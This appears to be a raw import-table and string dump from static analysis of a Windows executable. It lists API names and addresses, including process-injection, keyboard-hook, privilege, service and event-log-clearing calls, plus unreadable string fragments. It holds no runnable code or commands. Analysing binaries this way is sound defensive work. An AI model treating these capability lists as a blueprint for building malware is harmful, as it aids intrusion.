GetMonitorInfoW 00413284 NotifyWinEvent 00413288
GetKeyState 0041328C
RemoveMenu 00413290 SetDlgItemTextW 00413294
GetDesktopWindow 00413298
GetMessageTime 0041329C GetClipCursor 004132A0
UpdateWindow 004132A4
GetPriorityClipboardFormat 004132A8 DrawFocusRect 004132AC
DragDetect 004132B0
GetUpdateRect 004132B4 GetCursor 004132B8
SetLastErrorEx 004132BC
LoadBitmapA 004132C0 CharLowerA 004132C4
SetMenuDefaultItem 004132C8
DdeCreateStringHandleW 004132CC GetDialogBaseUnits 004132D0
WindowFromDC 004132D4
GetAltTabInfo 004132D8 GetMenuState 004132DC
DdeClientTransaction 004132E0 FindWindowW 004132E4
CreateWindowExA 004132E8
EnumDisplaySettingsA 004132EC DdeInitializeA 004132F0
EnumPropsExW 004132F4
OemToCharBuffW 004132F8
SetWindowsHookExW 004132FC
UnhookWindowsHookEx 00413300
SetMenuItemInfoA 00413304 WinHelpW 00413308
GetKeyboardLayout 0041330C
SetClipboardViewer 00413310 GetNextDlgGroupItem 00413314
ChildWindowFromPoint 00413318
EndPaint 0041331C EndMenu 00413320
ValidateRgn 00413324
RegisterDragDrop 00413540
OleCreateLinkToFile 00413544 StgCreateStorageEx 00413548
CoGetPSClsid 0041354C
OleCreateLinkEx 00413550 OleRegGetUserType 00413554
OleCreateLinkFromDataEx 00413558
CoRegisterChannelHook 0041355C OleRegGetMiscStatus 00413560
CreateOleAdviseHolder 00413564
CoRegisterSurrogate 00413568 OleCreateFromDataEx 0041356C
CoDosDateTimeToFileTime 00413570
PropVariantClear 00413574 ReadClassStg 00413578
StgOpenAsyncDocfileOnIFillLockBytes
0041357C OleCreateDefaultHandler 00413580
OleCreateMenuDescriptor 00413584
PathRemoveBlanksW 0041358C
UrlCompareA 00413590
PathFindOnPathA 00413594
SHAutoComplete 00413598 UrlGetLocationW 0041359C
PathIsRelativeW 004135A0
SHRegWriteUSValueW 004135A4 PathIsContentTypeW 004135A8
StrToIntW 004135AC
PathIsSameRootW 004135B0 SHRegQueryInfoUSKeyW 004135B4
SHRegGetUSValueA 004135B8
SHDeleteEmptyKeyW 004135BC StrCatW 004135C0
PathIsUNCW 004
ColorHLSToRGB 004135C8 PathStripPathW 004135CC
HashData 004135D0
StrChrW 004135D4 SHRegCloseUSKey 004135D8
StrDupA 004135DC
UrlGetPartW 004135E0 SHEnumValueA 004135E4
SHSetValueA 004135E8
PathMakeSystemFolderW 004135EC SHSkipJunction 004135F0
PathFindSuffixArrayW 004135F4
PathIsURLA 004135F8 PathGetDriveNumberA 004135FC
SHCopyKeyA 00413600
PathRenameExtensionA 00413604 StrNCatA 00413608
PathFileExistsA 0041360C StrPBrkA 00413610
PathCombineA 00413614
PathCompactPathW 00413618 PathRemoveArgsA 0041361C
SHRegQueryInfoUSKeyA 00413620
StrToIntExA 00413624
StrStrW 00413628
PathFindSuffixArrayA 0041362C
SHStrDupW 00413630 StrRChrIW 00413634
PathCanonicalizeA 00413638
StrRetToBufA 0041363C StrCmpIW 00413640
SHRegSetUSValueA 00413644
SHRegOpenUSKeyW 00413648 SHRegWriteUSValueA 0041364C
StrRetToStrA 00413650
UrlHashA 00413654
WaitForSingleObject 00413874
CreateMutexA 00413878 GetShortPathNameW 0041387C
FoldStringW 00413880
CompareStringA 00413884 ReadFile 00413888
FreeLibraryAndExitThread 0041388C
CompareFileTime 00413890 GetNamedPipeHandleStateA 00413894
GetUserDefaultLangID 00413898
SetDefaultCommConfigA 0041389C GetModuleHandleA 004138A0
GetSystemTime 004138A4
GetVolumeInformationW 004138A8 GetLongPathNameA 004138AC
Process32Next 004138B0
SetFileApisToANSI 004138B4 FlushFileBuffers 004138B8
GetSystemDirectoryW 004138BC
GetCommModemStatus 004138C0
GlobalSize 004138C4
SetFileAttributesA 004138C8
SetThreadPriority 004138CC CancelIo 004138D0
EnumCalendarInfoA 004138D4
TlsFree 004138D8 QueryPerformanceCounter 004138DC
GetCurrentDirectoryW 004138E0
WriteFileGather 004138E4 DefineDosDeviceW 004138E8
SetDefaultCommConfigW 004138EC
GetDevicePowerState 004138F0 SetPriorityClass 004138F4
GetPrivateProfileStringA 004138F8
GetNumberOfConsoleInputEvents 004138FC ReadDirectoryChangesW 00413900
EndUpdateResourceA 00413904
IsDBCSLeadByteEx 00413908 OpenMutexA 0041390C
SetTimeZoneInformation 00413910
lstrlen 00413914 CreateThread 00413918
CreateRemoteThread 0041391C
CompareStringW 00413920 SetProcessShutdownParameters 00413924
Toolhelp32ReadProcessMemory 00413928
GetPrivateProfileStructW 0041392C GetProcessHeaps 00413930
GetDateFormatW 00413934
SetTapeParameters 00413938 SetConsoleActiveScreenBuffer 0041393C
OpenMutexW 00413940 IsSystemResumeAutomatic 00413944
SetTapePosition 00413948
EraseTape 0041394C PostQueuedCompletionStatus 00413950
LocalFree 00413954
GetThreadPriority 00413958
FillConsoleOutputCharacterW 0041395C
lstrcmp 00413960
WaitForSingleObjectEx 00413964 GetComputerNameW 00413968
GetThreadTimes 0041396C
EnumCalendarInfoW 00413970 BackupWrite 00413974
SuspendThread 00413978
Comment Strings:
.text:004010A0 00000015 C nPniTP2S.~4-2$Ucnn-G
.text:00401A8C 00000010 C 5hG5`A$d$_fnVF9
.text:00401B28 00000011 C Yx>5;R[¦YA/<QlGy
.text:00401C1C 00000012 C >F;F2mS4d+Y¦[\\i(o
.text:00401C44 0000001F C Q)+X\"½[ad?Fn`+XdQVD-(^Ad>x:2`i
.text:00401C63 00000006 C ha[m_
.text:00402C0C 00000023 C Gn)4V8\\9#TnPcQ~(9kiF[#F:fF$^Q//#<5
.text:0040360C 00000005 C UhxP
.text:004037B1 0000001F C \\eGl#eS?)AkVUûP\"½a2>_5on.;RQ]x
.text:00403880 00000016 C c^+;V-<#_b^kV~2a-8P?/
.text:00403B30 0000001C C hRn\"#h8V$D3`G[iU\"cdXT!V`Rna
.text:00403B78 00000017 C GSi+nab(Q(R>6x)e8yVnU5
.text:00403BA1 00000021 C 5ûS8-½<<fo3nYmhn`-_9-h`4`V$i]Y.o
.text:0040445C 00000012 C ?Fx<9A6#5<h);<eb$
.rdata:00413980 0000000A C Xz!7j=D\aZf
.rdata:00413994 00000009 C d]5\r RP.h
.rdata:004139BD 00000008 C HhX<APc=
.rdata:004139C8 0000000B C jVX}pBgCO\t
.rdata:004139D5 00000009 C 7MGt_jXSZ
.rdata:004139DF 00000009 C aXb\"\x1B%jCD
.rdata:004139F3 00000007 C Z.0H!/V
.rdata:004139FB 00000009 C ~T<\x1B\\\tZ\x1Br
.rdata:00413A05 00000009 C -Y]%J()\vL
.rdata:00413A10 00000010 C T\n\b@@VecKiDW|Y\v\t
.rdata:00413A23 0000000E C $x4GFZ\\%k*oTW5
.rdata:00413A35 00000008 C [>&{~~ 7
.rdata:00413A3E 00000006 C 7>|n\vO
.rdata:00413A45 00000007 C /zYjKK<
.rdata:00413A56 00000007 C $x\\XgBx
.rdata:00413A5E 00000006 C 3&.Hw
.rdata:00414462 00000016 C BuildTrusteeWithNameW
.rdata:0041447A 00000010 C GetTrusteeNameA
.rdata:0041448C 00000019 C BuildImpersonateTrusteeA
.rdata:004144A8 00000016 C GetNamedSecurityInfoW
.rdata:004144C0 00000019 C CryptGetDefaultProviderA
.rdata:004144DC 00000012 C CryptDuplicateKey
.rdata:004144F0 0000000F C RegSetValueExW
.rdata:00414502 00000016 C DeregisterEventSource
.rdata:0041451A 00000019 C BuildSecurityDescriptorA
.rdata:00414536 00000018 C InitiateSystemShutdownW
.rdata:00414550 00000018 C RegQueryMultipleValuesW
.rdata:0041456A 00000013 C LookupAccountNameW
.rdata:00414580 00000012 C RegSetKeySecurity
.rdata:00414594 0000000E C RegEnumValueW
.rdata:004145A4 00000019 C SetServiceObjectSecurity
.rdata:004145C0 00000015 C RegisterEventSourceA
.rdata:004145D8 00000017 C SetEntriesInAuditListW
.rdata:004145F2 00000015 C BuildTrusteeWithSidW
.rdata:0041460A 0000000C C RegLoadKeyW
.rdata:00414618 00000018 C GetOldestEventLogRecord
.rdata:00414632 00000012 C LookupAccountSidA
.rdata:00414646 00000010 C GetTrusteeTypeW
.rdata:00414658 00000015 C LookupPrivilegeNameA
.rdata:00414670 0000000E C CryptHashData
.rdata:00414680 0000001B C ImpersonateNamedPipeClient
.rdata:0041469E 00000016 C ObjectOpenAuditAlarmW
.rdata:004146B6 0000000E C RegEnumKeyExA
.rdata:004146C6 00000019 C BuildSecurityDescriptorW
.rdata:004146E2 00000016 C LookupPrivilegeValueA
.rdata:004146FA 0000000A C DeleteAce
.rdata:00414706 00000011 C OpenProcessToken
.rdata:0041471A 0000000E C DeleteService
.rdata:0041472A 0000000D C CryptDecrypt
.rdata:0041473A 00000015 C CreateProcessAsUserW
.rdata:00414752 0000000D C RevertToSelf
.rdata:00414762 0000001A C IsValidSecurityDescriptor
.rdata:0041477E 0000000F C RegReplaceKeyW
.rdata:00416AC4 00000009 C SetEvent
.rdata:00416AD0 00000018 C SetProcessPriorityBoost
.rdata:00416AEA 0000000E C IsBadWritePtr
.rdata:00416AFA 00000010 C TerminateThread
.rdata:00416B0C 00000013 C EnumResourceTypesW
.rdata:00416B22 00000016 C GetPrivateProfileIntW
.rdata:00416B3A 00000011 C OpenFileMappingA
.rdata:00415152 00000010 C GetMenuItemRect
.rdata:00415164 00000012 C LoadMenuIndirectW
.rdata:00415178 00000017 C EnumDisplaySettingsExW
.rdata:00415192 00000014 C BeginDeferWindowPos
.rdata:004151A8 0000000B C OemToCharW
.rdata:004151B6 00000010 C GetMonitorInfoW
.rdata:004151C8 0000000F C NotifyWinEvent
.rdata:004151DA 0000000C C GetKeyState
.rdata:004151E8 0000000B C RemoveMenu
.rdata:004151F6 00000010 C SetDlgItemTextW
.rdata:00415208 00000011 C GetDesktopWindow
.rdata:0041521C 0000000F C GetMessageTime
.rdata:0041522E 0000000E C GetClipCursor
.rdata:0041523E 0000000D C UpdateWindow
.rdata:0041524E 0000001B C GetPriorityClipboardFormat
.rdata:0041526C 0000000E C DrawFocusRect
.rdata:0041527C 0000000B C DragDetect
.rdata:0041528A 0000000E C GetUpdateRect
.rdata:0041529A 0000000A C GetCursor
.rdata:004152A6 0000000F C SetLastErrorEx
.rdata:004152B8 0000000C C LoadBitmapA
.rdata:004152C6 0000000B C CharLowerA
.rdata:004152D4 00000013 C SetMenuDefaultItem
.rdata:004152EA 00000017 C DdeCreateStringHandleW
.rdata:00415304 00000013 C GetDialogBaseUnits
.rdata:0041531A 0000000D C WindowFromDC
.rdata:0041532A 0000000E C GetAltTabInfo
.rdata:0041533A 0000000D C GetMenuState
.rdata:0041534A 00000015 C DdeClientTransaction
.rdata:00415362 0000000C C FindWindowW
.rdata:00415370 00000010 C CreateWindowExA
.rdata:00415382 00000015 C EnumDisplaySettingsA
.rdata:0041539A 0000000F C DdeInitializeA
.rdata:004153AC 0000000D C EnumPropsExW
.rdata:004153BC 0000000F C OemToCharBuffW
.rdata:004153CE 00000012 C SetWindowsHookExW
.rdata:004153E2 00000014 C UnhookWindowsHookEx
.rdata:004153F8 00000011 C SetMenuItemInfoA
.rdata:0041540C 00000009 C WinHelpW
.rdata:00415418 00000012 C GetKeyboardLayout
.rdata:0041542C 00000013 C SetClipboardViewer
.rdata:00415442 00000014 C GetNextDlgGroupItem
.rdata:00415458 00000015 C ChildWindowFromPoint
.rdata:00415470 00000009 C EndPaint
.rdata:0041547C 00000008 C EndMenu
.rdata:00415486 0000000C C ValidateRgn
.rdata:00415494 00000010 C GetKeyNameTextA
.rdata:004154A6 0000000D C SetWindowPos
.rdata:004154B6 00000017 C RegisterWindowMessageW
.rdata:004154D0 0000000A C UnionRect
.rdata:004154DC 00000012 C SetCaretBlinkTime
.rdata:004154F0 00000018 C DestroyAcceleratorTable
.rdata:0041550A 00000017 C ChangeDisplaySettingsW
.rdata:00415524 0000000B C LoadImageA
.rdata:00415532 00000013 C SetMenuItemBitmaps
.rdata:00415548 00000010 C DdeUnaccessData
.rdata:0041555A 0000000F C DefWindowProcW
.rdata:0041556C 00000017 C CreateIconFromResource
.rdata:00415586 0000000C C EditWndProc
.rdata:00415594 0000000C C ChangeMenuW
.rdata:00414790 00000015 C CryptAcquireContextW
.rdata:004147A8 00000012 C LookupAccountSidW
.rdata:004147BC 00000018 C SetEntriesInAccessListW
.rdata:004147D6 00000010 C RegDeleteValueA
.rdata:004147E8 00000011 C RegQueryValueExA
.rdata:004147FC 0000001A C GetSidIdentifierAuthority
.rdata:00414818 00000012 C CryptGetHashParam
.rdata:0041482C 0000001D C PrivilegedServiceAuditAlarmA
.rdata:0041484C 00000028 C BuildImpersonateExplicitAccessWithNameA
.rdata:00414876 0000000D C GetLengthSid
.rdata:00414886 0000000F C CryptImportKey
.rdata:00414898 00000019 C AllocateAndInitializeSid
.rdata:004148B4 00000028 C BuildImpersonateExplicitAccessWithNameW
.rdata:004148DE 0000000F C CryptSignHashW
.rdata:004148F0 00000017 C GetServiceDisplayNameA
.rdata:0041490A 00000017 C EnumDependentServicesA
.rdata:00414924 00000014 C CryptReleaseContext
.rdata:0041493A 0000001B C GetExplicitEntriesFromAclW
.rdata:00414958 0000000D C GetUserNameW
.rdata:00414968 00000014 C CryptEnumProvidersW
.rdata:0041497E 00000011 C FindFirstFreeAce
.rdata:00414992 00000013 C CloseServiceHandle
.rdata:004149A8 00000015 C GetCurrentHwProfileW
.rdata:004149C0 00000017 C CancelOverlappedAccess
.rdata:004149DA 0000000E C StartServiceA
.rdata:004149EA 0000000C C RegCloseKey
.rdata:004149F8 0000000F C RegQueryValueA
.rdata:00414A0A 00000016 C CryptVerifySignatureW
.rdata:00414A22 00000016 C AdjustTokenPrivileges
.rdata:00414A3A 00000013 C QueryServiceStatus
.rdata:00414A50 00000014 C RegConnectRegistryA
.rdata:00414A66 00000014 C GetTokenInformation
.rdata:00414A7C 0000001F C GetAccessPermissionsForObjectW
.rdata:00414A9E 0000000F C RegQueryValueW
.rdata:00414AB0 0000001A C AccessCheckAndAuditAlarmW
.rdata:00414ACC 0000001A C SetSecurityDescriptorSacl
.rdata:00414AE8 00000016 C AreAnyAccessesGranted
.rdata:00414B00 00000017 C ObjectCloseAuditAlarmA
.rdata:00414B1A 00000014 C QueryServiceConfigA
.rdata:00414B30 0000000F C ClearEventLogW
.rdata:00414B42 0000000E C RegUnLoadKeyA
.rdata:00414B52 00000015 C LookupPrivilegeNameW
.rdata:00414B6A 00000010 C GetSecurityInfo
.rdata:00414B7C 0000000E C RegEnumKeyExW
.rdata:00414B8C 0000001B C ObjectPrivilegeAuditAlarmW
.rdata:00414BAA 00000010 C GetTrusteeTypeA
.rdata:00414BBC 0000000E C RegOpenKeyExW
.rdata:00414BCC 0000000E C RegCreateKeyA
.rdata:00414BDC 0000000E C IsTextUnicode
.rdata:00414BEC 0000000E C OpenEventLogW
.rdata:00414BFC 00000018 C CryptEnumProviderTypesW
.rdata:00414C16 0000000F C RegRestoreKeyW
.rdata:00414C28 00000012 C CryptGetProvParam
.rdata:00414C3C 00000015 C ChangeServiceConfigA
.rdata:00414C54 0000000C C RegSaveKeyA
.rdata:00414C62 0000001D C BuildExplicitAccessWithNameW
.rdata:00414C82 0000001A C GetSecurityDescriptorSacl
.rdata:00414C9E 0000000C C RegLoadKeyA
.rdata:00414CAC 00000014 C GetMultipleTrusteeA
.rdata:00414CC2 00000014 C AddAccessAllowedAce
.rdata:00414CD8 00000012 C SetAclInformation
.rdata:00414CEC 0000000F C ControlService
.rdata:00414CFE 00000013 C GetSecurityInfoExW
.rdata:00414D14 0000000F C RegRestoreKeyA
.rdata:00414D26 00000016 C ObjectOpenAuditAlarmA
.rdata:00414D3E 00000008 C CopySid
.rdata:00414D48 0000000F C OpenSCManagerA
.rdata:00414D5A 00000018 C RegQueryMultipleValuesA
.rdata:00414D74 00000010 C OpenThreadToken
.rdata:00414D86 0000000B C LogonUserW
.rdata:004155A2 00000009 C DrawEdge
.rdata:004155AE 0000000B C GetDlgItem
.rdata:004155BC 00000016 C InternalGetWindowText
.rdata:004155D4 00000017 C ChangeDisplaySettingsA
.rdata:004155EE 0000000C C InsertMenuW
.rdata:004155FC 0000000C C SetMenuInfo
.rdata:0041560A 00000011 C DdeSetUserHandle
.rdata:0041561E 0000000C C GetMessageW
.rdata:0041562C 0000000C C ModifyMenuW
.rdata:0041563A 0000001C C MsgWaitForMultipleObjectsEx
.rdata:00415658 00000012 C DrawAnimatedRects
.rdata:0041566C 00000016 C GetUserObjectSecurity
.rdata:00415684 0000001B C GetMenuCheckMarkDimensions
.rdata:004156A2 00000008 C GetMenu
.rdata:004156AC 0000000E C DestroyCursor
.rdata:004156BC 00000013 C IsDlgButtonChecked
.rdata:004156D2 00000012 C GetCaretBlinkTime
.rdata:004156E6 0000000F C GetShellWindow
.rdata:004156F8 00000012 C GetClipboardOwner
.rdata:0041570C 00000010 C CallWindowProcA
.rdata:0041571E 00000013 C GetWindowPlacement
.rdata:00415734 0000000F C TabbedTextOutA
.rdata:00415746 00000014 C LoadKeyboardLayoutW
.rdata:0041575C 00000009 C IsZoomed
.rdata:00415768 00000018 C CreateAcceleratorTableW
.rdata:00415782 00000009 C FillRect
.rdata:0041578E 00000013 C RealGetWindowClass
.rdata:004157A4 0000000C C ToUnicodeEx
.rdata:004157B2 00000013 C OpenWindowStationW
.rdata:004157C8 0000000D C IsCharUpperA
.rdata:004157D8 0000000F C InvalidateRect
.rdata:004157EA 0000000F C GetMenuStringW
.rdata:004157FC 00000011 C IsDialogMessageW
.rdata:00415810 0000000F C ReleaseCapture
.rdata:00415822 0000000E C GetSystemMenu
.rdata:00415832 0000000B C SetCapture
.rdata:00415840 0000000C C GrayStringA
.rdata:0041584E 0000000E C SwitchDesktop
.rdata:0041585E 00000008 C SetRect
.rdata:00415868 0000000D C GetUpdateRgn
.rdata:00415878 0000000E C GetDlgItemInt
.rdata:00415888 0000000A C LoadMenuA
.rdata:00415892 0000000B C USER32.dll
.rdata:004158A0 00000011 C CoCreateInstance
.rdata:004158B4 00000018 C CoRegisterMessageFilter
.rdata:004158CE 0000000E C OleCreateLink
.rdata:004158DE 0000000C C OleCreateEx
.rdata:004158EC 00000008 C OleLoad
.rdata:004158F6 0000000E C GetConvertStg
.rdata:00415906 00000015 C CoQueryReleaseObject
.rdata:0041591E 00000017 C CreateDataAdviseHolder
.rdata:00415938 0000001F C CoGetInterfaceAndReleaseStream
.rdata:0041595A 0000000E C WriteClassStm
.rdata:0041596A 0000001B C StgGetIFillLockBytesOnFile
.rdata:00415988 00000010 C OleBuildVersion
.rdata:0041599A 00000014 C OleRegEnumFormatEtc
.rdata:004159B0 00000016 C GetRunningObjectTable
.rdata:004159C8 00000010 C UtGetDvtd32Info
.rdata:004159DA 00000018 C OleCreateStaticFromData
.rdata:004159F4 00000012 C OleCreateFromFile
.rdata:00415A08 00000011 C OleDoAutoConvert
.rdata:00415A1C 00000013 C OpenOrCreateStream
.rdata:00415A32 00000015 C OleNoteObjectVisible
.rdata:00415A4A 00000012 C CreateAntiMoniker
.rdata:00415A5E 00000020 C OleMetafilePictFromIconAndLabel
.rdata:00415A80 00000015 C CoUnmarshalInterface
.rdata:00415A98 00000019 C OleCreateEmbeddingHelper
.rdata:00415AB4 00000016 C CoRegisterClassObject
.rdata:00415ACC 00000015 C FreePropVariantArray
.rdata:00415AE4 00000012 C OleSetAutoConvert
.rdata:00414D94 00000011 C CryptDestroyHash
.rdata:00414DA8 00000015 C AbortSystemShutdownW
.rdata:00414DC0 00000012 C GetAclInformation
.rdata:00414DD4 0000000F C CreateServiceW
.rdata:00414DE6 0000000C C CryptGenKey
.rdata:00414DF4 0000001F C LookupSecurityDescriptorPartsW
.rdata:00414E16 00000023 C ConvertAccessToSecurityDescriptorA
.rdata:00414E3C 00000018 C SetEntriesInAccessListA
.rdata:00414E56 00000015 C AbortSystemShutdownA
.rdata:00414E6E 00000011 C SetEntriesInAclW
.rdata:00414E82 00000011 C GetFileSecurityA
.rdata:00414E96 0000000E C OpenEventLogA
.rdata:00414EA6 00000012 C CryptSetHashParam
.rdata:00414EBA 00000014 C CryptSetProviderExA
.rdata:00414ED0 00000014 C QueryServiceConfigW
.rdata:00414EE6 00000014 C CryptSetProviderExW
.rdata:00414EFC 00000014 C OpenBackupEventLogW
.rdata:00414F10 0000000D C ADVAPI32.dll
.rdata:00414F20 00000014 C SendMessageTimeoutW
.rdata:00414F36 00000011 C TileChildWindows
.rdata:00414F4A 00000008 C EndTask
.rdata:00414F54 00000011 C IsDialogMessageA
.rdata:00414F68 00000013 C DdeQueryNextServer
.rdata:00414F7E 0000000E C FlashWindowEx
.rdata:00414F8E 00000017 C GetKeyboardLayoutNameA
.rdata:00414FA8 00000012 C DdeFreeDataHandle
.rdata:00414FBC 00000011 C SetThreadDesktop
.rdata:00414FD0 0000000E C GetInputState
.rdata:00414FE0 00000011 C SetKeyboardState
.rdata:00414FF4 00000011 C SetMenuItemInfoW
.rdata:00415008 0000000E C GetMenuItemID
.rdata:00415018 0000000C C GrayStringW
.rdata:00415026 0000000F C EmptyClipboard
.rdata:00415038 00000010 C CreatePopupMenu
.rdata:0041504A 0000000C C LoadStringW
.rdata:00415058 0000000F C CallMsgFilterA
.rdata:0041506A 00000010 C GetActiveWindow
.rdata:0041507C 0000000F C RegisterHotKey
.rdata:0041508E 00000010 C DialogBoxParamA
.rdata:004150A0 00000011 C ExcludeUpdateRgn
.rdata:004150B4 0000000C C GetAncestor
.rdata:004150C2 0000000C C GetSysColor
.rdata:004150D0 0000000D C GetDlgCtrlID
.rdata:004150E0 00000014 C DdeFreeStringHandle
.rdata:004150F6 0000000C C LoadStringA
.rdata:00415104 00000012 C MonitorFromWindow
.rdata:00415118 00000011 C SetDeskWallpaper
.rdata:0041512C 0000000A C DrawFrame
.rdata:00415138 00000017 C RegisterWindowMessageA
.rdata:00415B96 0000001C C CoGetCurrentLogicalThreadId
.rdata:00415BB4 00000012 C CreateItemMoniker
.rdata:00415BC8 0000000C C CoGetMalloc
.rdata:00415BD6 0000000E C WriteClassStg
.rdata:00415BE6 00000011 C ReadStringStream
.rdata:00415BFA 00000017 C CreateGenericComposite
.rdata:00415C14 00000010 C PropVariantCopy
.rdata:00415C26 00000011 C StgOpenStorageEx
.rdata:00415C3A 00000008 C OleSave
.rdata:00415C44 0000000E C IsAccelerator
.rdata:00415C54 0000000C C BindMoniker
.rdata:00415C62 00000011 C CoGetCallContext
.rdata:00415C76 00000016 C CoFreeUnusedLibraries
.rdata:00415C8E 0000000F C StgOpenStorage
.rdata:00415CA0 00000013 C UpdateDCOMSettings
.rdata:00415CB6 00000014 C CoGetMarshalSizeMax
.rdata:00415CCC 00000011 C OleGetIconOfFile
.rdata:00415CE0 0000001B C StgOpenStorageOnILockBytes
.rdata:00415CFE 00000014 C CoQueryProxyBlanket
.rdata:00415D14 00000018 C UtConvertDvtd16toDvtd32
.rdata:00415D2E 0000001E C CoQueryAuthenticationServices
.rdata:00415AF8 00000018 C OleTranslateAccelerator
.rdata:00415B12 00000010 C OleSaveToStream
.rdata:00415B24 00000012 C CoGetTreatAsClass
.rdata:00415B38 0000000F C CoRevertToSelf
.rdata:00415B4A 0000000F C CoInitializeEx
.rdata:00415B5C 00000016 C OleIsCurrentClipboard
.rdata:00415B74 00000020 C OleConvertIStorageToOLESTREAMEx
.rdata:00416156 0000000A C StrToIntW
.rdata:00416162 00000010 C PathIsSameRootW
.rdata:00416174 00000015 C SHRegQueryInfoUSKeyW
.rdata:0041618C 00000011 C SHRegGetUSValueA
.rdata:004161A0 00000012 C SHDeleteEmptyKeyW
.rdata:004161B4 00000008 C StrCatW
.rdata:004161BE 0000000B C PathIsUNCW
.rdata:004161CC 0000000E C ColorHLSToRGB
.rdata:004161DC 0000000F C PathStripPathW
.rdata:004161EE 00000009 C HashData
.rdata:004161FA 00000008 C StrChrW
.rdata:00416204 00000010 C SHRegCloseUSKey
.rdata:00416216 00000008 C StrDupA
.rdata:00416220 0000000C C UrlGetPartW
.rdata:0041622E 0000000D C SHEnumValueA
.rdata:0041623E 0000000C C SHSetValueA
.rdata:0041624C 00000016 C PathMakeSystemFolderW
.rdata:00416264 0000000F C SHSkipJunction
.rdata:00416276 00000015 C PathFindSuffixArrayW
.rdata:0041628E 0000000B C PathIsURLA
.rdata:0041629C 00000014 C PathGetDriveNumberA
.rdata:004162B2 0000000B C SHCopyKeyA
.rdata:004162C0 00000015 C PathRenameExtensionA
.rdata:004162D8 00000009 C StrNCatA
.rdata:004162E4 00000010 C PathFileExistsA
.rdata:004162F6 00000009 C StrPBrkA
.rdata:00416302 0000000D C PathCombineA
.rdata:00416312 00000011 C PathCompactPathW
.rdata:00416326 00000010 C PathRemoveArgsA
.rdata:00416338 00000015 C SHRegQueryInfoUSKeyA
.rdata:00416350 0000000C C StrToIntExA
.rdata:0041635E 00000008 C StrStrW
.rdata:00416368 00000015 C PathFindSuffixArrayA
.rdata:00416380 0000000A C SHStrDupW
.rdata:0041638C 0000000A C StrRChrIW
.rdata:00416398 00000012 C PathCanonicalizeA
.rdata:004163AC 0000000D C StrRetToBufA
.rdata:004163BC 00000009 C StrCmpIW
.rdata:004163C8 00000011 C SHRegSetUSValueA
.rdata:004163DC 00000010 C SHRegOpenUSKeyW
.rdata:004163EE 00000013 C SHRegWriteUSValueA
.rdata:00416404 0000000D C StrRetToStrA
.rdata:00416414 00000009 C UrlHashA
.rdata:00416420 00000013 C PathFindExtensionA
.rdata:00416436 00000011 C SHRegGetUSValueW
.rdata:0041644A 0000000C C UrlGetPartA
.rdata:00416458 0000000A C StrToIntA
.rdata:00416464 00000009 C StrCSpnW
.rdata:00416470 00000016 C PathMakeSystemFolderA
.rdata:00416488 00000010 C PathFileExistsW
.rdata:0041649A 00000011 C PathGetCharTypeA
.rdata:004164AE 0000000A C StrRStrIW
.rdata:004164BA 0000000C C UrlCombineW
.rdata:004164C8 00000012 C SHRegCreateUSKeyW
.rdata:004164DC 00000011 C PathGetCharTypeW
.rdata:004164F0 00000014 C PathSetDlgItemPathW
.rdata:00416506 00000011 C UrlCanonicalizeA
.rdata:0041651A 00000010 C PathIsFileSpecW
.rdata:0041652C 00000014 C PathIsSystemFolderA
.rdata:00416542 0000000F C PathBuildRootW
.rdata:00416554 00000017 C SHRegDeleteEmptyUSKeyA
.rdata:0041656E 00000009 C ChrCmpIW
.rdata:0041657A 00000015 C SHRegGetBoolUSValueA
.rdata:00415D4E 00000010 C OleSetClipboard
.rdata:00415D60 0000000B C DoDragDrop
.rdata:00415D6E 0000000C C IsEqualGUID
.rdata:00415D7C 00000015 C CoReleaseMarshalData
.rdata:00415D94 0000000A C OleCreate
.rdata:00415DA0 00000015 C CoQueryClientBlanket
.rdata:00415DB8 0000000D C ReadClassStm
.rdata:00415DC8 00000011 C ReleaseStgMedium
.rdata:00415DDC 00000012 C CreateFileMoniker
.rdata:00415DF0 00000015 C OleSetMenuDescriptor
.rdata:00415E08 00000015 C CreatePointerMoniker
.rdata:00415E20 0000000F C CoTreatAsClass
.rdata:00415E32 00000013 C CoFreeAllLibraries
.rdata:00415E48 00000021 C StgGetIFillLockBytesOnILockBytes
.rdata:00415E6C 0000001A C CreateILockBytesOnHGlobal
.rdata:00415E88 00000014 C CreateObjrefMoniker
.rdata:00415E9E 0000000E C CreateBindCtx
.rdata:00415EAE 0000000E C StringFromIID
.rdata:00415EBE 00000015 C CoInitializeSecurity
.rdata:00415ED6 0000000F C CoBuildVersion
.rdata:00415EE8 00000012 C WriteStringStream
.rdata:00415EFC 0000001E C CoCreateFreeThreadedMarshaler
.rdata:00415F1C 00000011 C RegisterDragDrop
.rdata:00415F30 00000014 C OleCreateLinkToFile
.rdata:00415F46 00000013 C StgCreateStorageEx
.rdata:00415F5C 0000000D C CoGetPSClsid
.rdata:00415F6C 00000010 C OleCreateLinkEx
.rdata:00415F7E 00000012 C OleRegGetUserType
.rdata:00415F92 00000018 C OleCreateLinkFromDataEx
.rdata:00415FAC 00000016 C CoRegisterChannelHook
.rdata:00415FC4 00000014 C OleRegGetMiscStatus
.rdata:00415FDA 00000016 C CreateOleAdviseHolder
.rdata:00415FF2 00000014 C CoRegisterSurrogate
.rdata:00416008 00000014 C OleCreateFromDataEx
.rdata:0041601E 00000018 C CoDosDateTimeToFileTime
.rdata:00416038 00000011 C PropVariantClear
.rdata:0041604C 0000000D C ReadClassStg
.rdata:0041605C 00000024 C StgOpenAsyncDocfileOnIFillLockBytes
.rdata:00416082 00000018 C OleCreateDefaultHandler
.rdata:0041609C 00000018 C OleCreateMenuDescriptor
.rdata:004160B4 0000000A C ole32.dll
.rdata:004160C0 00000012 C PathRemoveBlanksW
.rdata:004160D4 0000000C C UrlCompareA
.rdata:004160E2 00000010 C PathFindOnPathA
.rdata:004160F4 0000000F C SHAutoComplete
.rdata:00416106 00000010 C UrlGetLocationW
.rdata:00416118 00000010 C PathIsRelativeW
.rdata:0041612A 00000013 C SHRegWriteUSValueW
.rdata:00416140 00000013 C PathIsContentTypeW
.rdata:00416614 0000000D C SHEnumKeyExW
.rdata:00416624 00000011 C PathCompactPathA
.rdata:00416638 0000000E C PathSkipRootA
.rdata:00416648 00000018 C PathUnmakeSystemFolderW
.rdata:00416662 0000000C C StrToIntExW
.rdata:00416670 00000011 C PathQuoteSpacesA
.rdata:00416684 00000016 C PathSearchAndQualifyA
.rdata:0041669C 00000010 C SHQueryValueExW
.rdata:004166AE 00000010 C PathRemoveArgsW
.rdata:004166C0 00000017 C PathFindNextComponentW
.rdata:004166DA 0000000B C PathIsUNCA
.rdata:004166E8 00000013 C PathIsContentTypeA
.rdata:004166FE 0000000D C StrRetToBufW
.rdata:0041670E 00000012 C PathFindFileNameW
